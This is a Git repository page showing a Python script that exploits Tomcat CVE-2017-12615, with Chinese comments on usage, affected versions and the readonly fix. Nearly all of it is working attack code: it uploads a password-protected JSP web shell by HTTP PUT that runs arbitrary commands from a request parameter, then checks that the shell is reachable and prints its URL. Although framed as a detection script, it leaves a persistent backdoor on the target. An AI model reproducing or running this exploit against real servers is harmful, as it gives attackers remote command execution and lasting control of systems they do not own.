1120362990/vulnerability-list
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
0d2ec0aba57061300d61ef41b5d3b04041d911e6
vulnerability-list/weblogic/CVE_2017_12615.py
rpkr e8780257fc 修复 CVE_2017_12615 误报问题
2019-08-30 14:17:23 +08:00

49 lines
1.7 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# -*- coding: utf-8 -*-
import sys
import requests
import time
'''
Usage:
moon.py -u tomcat http://127.0.0.1:8080
shell: http://127.0.0.1:8080/201712615.jsp?pwd=fff&cmd=whoami
影响范围Linux/Windows Tomcat: 7.0.0 to 7.0.79 - 官网数据
成因Tomcat配置了可写readonly=false导致我们可以往服务器写文件
最好的解决方式是将 conf/web.xml 中对于 DefaultServlet 的 readonly 设置为 true
'''
def attack(URL):
print('[+]开始检测-Tomcat-CVE-2017-12615。[+]')
url = URL + '/T68t8YT86.jsp/'
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
headers={"User-Agent":user_agent}
data="""<%
if("fff".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>"""
try:
requests.put(url, headers=headers, data=data)
time.sleep(2)
verify_response = requests.get(url[:-1], headers=headers, allow_redirects=False)
if verify_response.status_code == 200:
print('存在-Tomcat-CVE-2017-12615!!!')
print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami')
else :
print('访问shell地址'+verify_response.status_code)
print("未发现-Tomcat-CVE-2017-12615。")
except :
print("未发现-Tomcat-CVE-2017-12615。")
print('[+]检测结束-Tomcat-CVE-2017-12615。[+]')
print('\n')
if __name__ == "__main__":
attack()
Reference in New Issue View Git Blame Copy Permalink